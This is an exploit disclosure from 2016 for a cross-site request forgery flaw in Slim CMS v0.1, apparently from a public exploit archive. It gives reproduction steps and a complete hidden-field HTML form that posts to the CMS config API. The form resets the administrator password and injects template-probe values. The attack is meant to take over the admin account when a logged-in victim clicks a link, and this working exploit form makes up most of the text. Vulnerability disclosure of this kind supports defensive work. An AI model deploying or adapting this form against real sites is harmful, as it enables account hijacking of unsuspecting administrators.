<!--# Exploit Title: CSRF Vulnerability on Slim CMS v0.1# CMS Link: https://github.com/revuls/SlimCMS/releases# Date: 16th June'2016# Exploit Author: Avinash Kumar Thapa aka "-Acid"# Vendor Homepage: http://www.slimcms.nl/# Software Link: https://github.com/revuls/SlimCMS/releases# Version: Slim CMSv0.1# Tested on: Windows 10,XAMPP# Twitter: https://twitter.com/m_avinash143
CSRF : Cross-Site Request Forgery (CSRF)is a type of attack that occurs when a malicious web site, email, blog, instant message,or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
Vulnerability Description :
It is possible to change the password of the administrator and complete account can be take over using this.
Steps to Reproduce the same
1. Login into the account.2. Navigate to http://localhost/SlimCMS/admin/config
3. Fill the details and intecept the request using BurpSuite
Request Intercepted
---------------------><html><body><form action="http://localhost/SlimCMS/api/config" method="POST"><inputtype="hidden" name="title" value="{{7*7}}"/><inputtype="hidden" name="description" value="{{7*7}}"/><inputtype="hidden" name="user" value="admin"/><inputtype="hidden" name="password" value="password"/><inputtype="hidden" name="theme" value="default"/><inputtype="hidden" name="url" value="http://localhost/SlimCMS"/><inputtype="submit" value="Submit request"/></form></body></html><!--4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).-->
